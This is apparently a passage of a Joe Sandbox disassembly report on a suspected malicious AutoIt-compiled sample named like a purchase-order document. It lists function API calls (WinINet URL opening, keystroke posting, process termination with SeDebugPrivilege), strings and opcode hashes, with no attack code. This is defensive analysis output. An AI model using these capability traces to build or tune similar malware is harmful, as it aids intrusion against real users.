Opcode Fuzzy Hash: a599e7b3fe8cf7e937dcf8e93af8a2c9d9ebf8f4ea4b44cdf9599be449650e20
Instruction Fuzzy Hash: DF319AB1601208AFD7219FA58C88AEB7BFCFB99740B54891EF486D2210DB34DD44CBE0

Function 001A989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00183AAF,?,?,Bad directive syntax error,001DCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001A98BC
LoadStringW.USER32(00000000,?,00183AAF,?), ref: 001A98C3

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001A9987

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 001A98F1
., xrefs: 001A996D
Line %d (File "%s"):, xrefs: 001A992D
Error: , xrefs: 001A9955
Line %d:, xrefs: 001A9912

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 7398d01e21f9f935482a2a09b2b258f9bfc62675c77e13e00e2b28cf1537d9a6
Instruction ID: 1a07a6baaa55814c67c01e21c433dd1fdbb35f4246b88384d2da8f912bc22a31
Opcode Fuzzy Hash: 7398d01e21f9f935482a2a09b2b258f9bfc62675c77e13e00e2b28cf1537d9a6
Instruction Fuzzy Hash: 99218D3280021AFBDF15AF90CC0AEEE7779BF29704F04446AF515660A2EB319668DB50

Function 001A209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 001A20AB
GetClassNameW.USER32(00000000,?,00000100), ref: 001A20C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001A214D

Strings

list, xrefs: 001A212F
SHELLDLL_DefView, xrefs: 001A20CC
largeicons, xrefs: 001A20E1
details, xrefs: 001A20FB
smallicons, xrefs: 001A2115

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: a9a34fb94e284435bc2e179a994ae9e97604f7d4bd95cad77888119ab81cc959
Instruction ID: 4fadaeb7ddad6fe93b3e58544bffd2585131c153934d40d5d1c0a493f870697e
Opcode Fuzzy Hash: a9a34fb94e284435bc2e179a994ae9e97604f7d4bd95cad77888119ab81cc959
Instruction Fuzzy Hash: E01106BE688717BAFB052228DC06DE7379CCF17328F204116FB05A50D6EF75A8625A54

Function 00178D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0daef21090bf360aa3b7183bd71bc9ade8703c637bae1c342090b675022f9d58
Instruction ID: 05cc89f691d2fcb97b238636a798cbd9b94a6df16d0b73f8a5a5783893242972
Opcode Fuzzy Hash: 0daef21090bf360aa3b7183bd71bc9ade8703c637bae1c342090b675022f9d58
Instruction Fuzzy Hash: 6CC1F374904249AFCB11DFA8D889BADBBB4BF1A310F148099F51CA7392CB708946CB61

Function 0017CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0017CEB7
_free.LIBCMT ref: 0017CF22
_free.LIBCMT ref: 0017CF48
_free.LIBCMT ref: 0017CF71
_free.LIBCMT ref: 0017CFA9
_free.LIBCMT ref: 0017CFDA
_free.LIBCMT ref: 0017D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0017D09C
_free.LIBCMT ref: 0017D0B5

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: cc198d2f23e4ac879480720cf3cc37887c2db0d4dc2522010a1730cbcdbf4d15
Instruction ID: a00a7ad7d3ba88a793a7cf96643d917b90a825c9891993c7975e17a0305d5479
Opcode Fuzzy Hash: cc198d2f23e4ac879480720cf3cc37887c2db0d4dc2522010a1730cbcdbf4d15
Instruction Fuzzy Hash: 36614571904314AFDB25AFB4BC85AAE7BB5EF16720F04C16EF94CA7281DB319D418790

Function 001D50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 001D5186
ShowWindow.USER32(?,00000000), ref: 001D51C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 001D51CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 001D51D1

Part of subcall function 001D6FBA: DeleteObject.GDI32(00000000), ref: 001D6FE6

GetWindowLongW.USER32(?,000000F0), ref: 001D520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 001D521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 001D524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 001D5287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 001D5296

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: e1366c15eeb5148a457c29fbab1bd895bf053c457595429a8e50497b492eacf8
Instruction ID: 891788b835e39e2215b7e5cc7ce40f863e150b41c662a13304e40385741cf9ab
Opcode Fuzzy Hash: e1366c15eeb5148a457c29fbab1bd895bf053c457595429a8e50497b492eacf8
Instruction Fuzzy Hash: 3951BE30A41A09FEEF249F24CC4ABD93B73EB15365F148113FA259A3E0C775A998DB41

Function 00158B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00196890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001968A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001968B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001968D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001968F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00158874,00000000,00000000,00000000,000000FF,00000000), ref: 00196901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0019691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00158874,00000000,00000000,00000000,000000FF,00000000), ref: 0019692D

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 0d10eceb5c8b6a4178d652f233462258c4708926706952b171f5f87478e77773
Instruction ID: fbc9b85f2b77a9ff98548e79db188d6cb32df6ba816921c6cffb70acd8c17047
Opcode Fuzzy Hash: 0d10eceb5c8b6a4178d652f233462258c4708926706952b171f5f87478e77773
Instruction Fuzzy Hash: 86519870600309EFDF24CF24CC55FAA7BB9EB58761F104519F962AB2A0DB70E990DB50

Function 001BC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001BC182
GetLastError.KERNEL32 ref: 001BC195
SetEvent.KERNEL32(?), ref: 001BC1A9

Part of subcall function 001BC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001BC272
Part of subcall function 001BC253: GetLastError.KERNEL32 ref: 001BC322
Part of subcall function 001BC253: SetEvent.KERNEL32(?), ref: 001BC336
Part of subcall function 001BC253: InternetCloseHandle.WININET(00000000), ref: 001BC341

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 5c144107d05387b8ce5aeb4f25d9084902bcc3fc2f96541063613e06b15e98e2
Instruction ID: 231c6ae5adc7fd5b507fa48178b057fab04c572b88c1c32aae61e84b3770f417
Opcode Fuzzy Hash: 5c144107d05387b8ce5aeb4f25d9084902bcc3fc2f96541063613e06b15e98e2
Instruction Fuzzy Hash: 6E318D71202606EFDB219FA9DC44AA6BBF9FF58300B04481EF956C6A10D730E854DBE0

Function 001A25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 001A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001A3A57
Part of subcall function 001A3A3D: GetCurrentThreadId.KERNEL32 ref: 001A3A5E
Part of subcall function 001A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001A25B3), ref: 001A3A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 001A25BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001A25DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001A25DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 001A25E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001A2601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 001A2605
MapVirtualKeyW.USER32(00000025,00000000), ref: 001A260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001A2623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 001A2627

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: e48cab23c121a5b004a82c2d001f600ba1b6ff0044f34abc038fb8946938277d
Instruction ID: cc732c2c6aa210728c800c992bb64f3b7bccc98cc21e0a3e839b9c8ff411a810
Opcode Fuzzy Hash: e48cab23c121a5b004a82c2d001f600ba1b6ff0044f34abc038fb8946938277d
Instruction Fuzzy Hash: 8A01B530691320FBFF1067689C8AF993F59DB5AB11F100402F318AF1D1CAF15484CAA9

Function 001A1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,001A1449,?,?,00000000), ref: 001A180C
HeapAlloc.KERNEL32(00000000,?,001A1449,?,?,00000000), ref: 001A1813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001A1449,?,?,00000000), ref: 001A1828
GetCurrentProcess.KERNEL32(?,00000000,?,001A1449,?,?,00000000), ref: 001A1830
DuplicateHandle.KERNEL32(00000000,?,001A1449,?,?,00000000), ref: 001A1833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001A1449,?,?,00000000), ref: 001A1843
GetCurrentProcess.KERNEL32(001A1449,00000000,?,001A1449,?,?,00000000), ref: 001A184B
DuplicateHandle.KERNEL32(00000000,?,001A1449,?,?,00000000), ref: 001A184E
CreateThread.KERNEL32(00000000,00000000,001A1874,00000000,00000000,00000000), ref: 001A1868

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: a102f7843cb034abd52f2c94fc8eaa3a64209a55fd8df94ce8c0a5e90a33c936
Instruction ID: bcb703f7ff77e81b98b3af35d2f63b76765e55c4ae92252ede2cdaefb348e30d
Opcode Fuzzy Hash: a102f7843cb034abd52f2c94fc8eaa3a64209a55fd8df94ce8c0a5e90a33c936
Instruction Fuzzy Hash: 9501BF75241315FFE710AB65DC4DF573B6CEB89B11F004411FA05DB591C6749840CB60

Function 001CA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 001AD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 001AD501
Part of subcall function 001AD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 001AD50F
Part of subcall function 001AD4DC: CloseHandle.KERNEL32(00000000), ref: 001AD5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 001CA16D
GetLastError.KERNEL32 ref: 001CA180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 001CA1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 001CA268
GetLastError.KERNEL32(00000000), ref: 001CA273
CloseHandle.KERNEL32(00000000), ref: 001CA2C4

Strings

SeDebugPrivilege, xrefs: 001CA18F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: ddbe28237f6c3620381deb1498cf9aa600b11d6666a9970f17d0df8b2c2b127b
Instruction ID: 02c349e57baf5d2d2c1c88db52865dd6255bc554da7b470cb33a4df988465677
Opcode Fuzzy Hash: ddbe28237f6c3620381deb1498cf9aa600b11d6666a9970f17d0df8b2c2b127b
Instruction Fuzzy Hash: DF619E70205252AFD721DF18C494F15BBE1AF6431CF58848CE4668BBA3C776EC49CB92

Function 001D3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 001D3925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 001D393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001D3954
_wcslen.LIBCMT ref: 001D3999
SendMessageW.USER32(?,00001057,00000000,?), ref: 001D39C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 001D39F4

Strings

SysListView32, xrefs: 001D38F7

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 7040b339ec858eb8323bb222eefe301788d19d7bdbb9502214f44c36314c0fee
Instruction ID: 5f69437ee4b4e6081dcf38767473fea8f2fff0dbc38fe2173ce54fe80bf5ceaf
Opcode Fuzzy Hash: 7040b339ec858eb8323bb222eefe301788d19d7bdbb9502214f44c36314c0fee
Instruction Fuzzy Hash: D741A271A00219ABEF219F64CC49BEA7BA9EF18354F100527F958E7281D771DA94CB90

Function 001ABC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001ABCFD
IsMenu.USER32(00000000), ref: 001ABD1D
CreatePopupMenu.USER32 ref: 001ABD53
GetMenuItemCount.USER32(00B858C8), ref: 001ABDA4
InsertMenuItemW.USER32(00B858C8,?,00000001,00000030), ref: 001ABDCC

Strings

2, xrefs: 001ABD37
0, xrefs: 001ABCA8

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: b1e79648c7be70c8b63a1c05f2679bcab68205bbe4a6228c4b39dc02639dcbce
Instruction ID: cb5273f8a2aa4b9a7589011e38b4e4461055c0d0b93e30eb123f70750907a843
Opcode Fuzzy Hash: b1e79648c7be70c8b63a1c05f2679bcab68205bbe4a6228c4b39dc02639dcbce
Instruction Fuzzy Hash: 3851BF78A092859BDF11CFF8D8C4BAEBBF4BF56318F14421AE401DB292D7709940CB51

Function 001AC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 001AC913

Strings

stop, xrefs: 001AC8E4
info, xrefs: 001AC8B4
warning, xrefs: 001AC8FC
question, xrefs: 001AC8CC
blank, xrefs: 001AC895

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 1556e3aeb1a37c9baf2fa72bdff746e6f0ac5f266632de7210a30caace818248
Instruction ID: 6a6380e8b250f3e671a16afee636bbca4e7daa0a911b93c96f67da83e82c6d42
Opcode Fuzzy Hash: 1556e3aeb1a37c9baf2fa72bdff746e6f0ac5f266632de7210a30caace818248
Instruction Fuzzy Hash: 2F11273A689307BAE7059B549C83DAB67DCDF27328B20402EF500A62C2E7A49E1052E5

Function 001AED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 001AED2A
_wcslen.LIBCMT ref: 001AED3B
_wcslen.LIBCMT ref: 001AED79
_wcslen.LIBCMT ref: 001AEDAF
_wcslen.LIBCMT ref: 001AEDDF
_wcslen.LIBCMT ref: 001AEDEF
_wcslen.LIBCMT ref: 001AEE2B
_wcslen.LIBCMT ref: 001AEE5A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 1cc5898ede9544b5b9d6159df3582d95f5ca60eb11679c3dde628dd05f4f6cea
Instruction ID: 6c0e3d9ca05449db28eb89b14a1f02047c63e6054ec1e9bceaf91b8261e3ac96
Opcode Fuzzy Hash: 1cc5898ede9544b5b9d6159df3582d95f5ca60eb11679c3dde628dd05f4f6cea
Instruction Fuzzy Hash: 5F41D466D1021876DB11EBF4CC8A9CFB7A8AF56310F508466F518E3121FB34E265C3E5

Function 0015F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0019682C,00000004,00000000,00000000), ref: 0015F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0019682C,00000004,00000000,00000000), ref: 0019F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0019682C,00000004,00000000,00000000), ref: 0019F454

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 2b7960383591c662796030159bb268f97feac57a0bc618304f5deb646b89409f
Instruction ID: 55248c08639c7932a70187f7ca5e8e30bda9427bce591ab47f46afb001f0fa8f
Opcode Fuzzy Hash: 2b7960383591c662796030159bb268f97feac57a0bc618304f5deb646b89409f
Instruction Fuzzy Hash: 2C415231605A40FECB388B3DC88876A7B91BB5631AF15443DF8679B560C771A4CBC751

Function 001D2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 001D2D1B
GetDC.USER32(00000000), ref: 001D2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001D2D2E
ReleaseDC.USER32(00000000,00000000), ref: 001D2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001D2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001D2D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,001D5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 001D2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001D2DE1

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

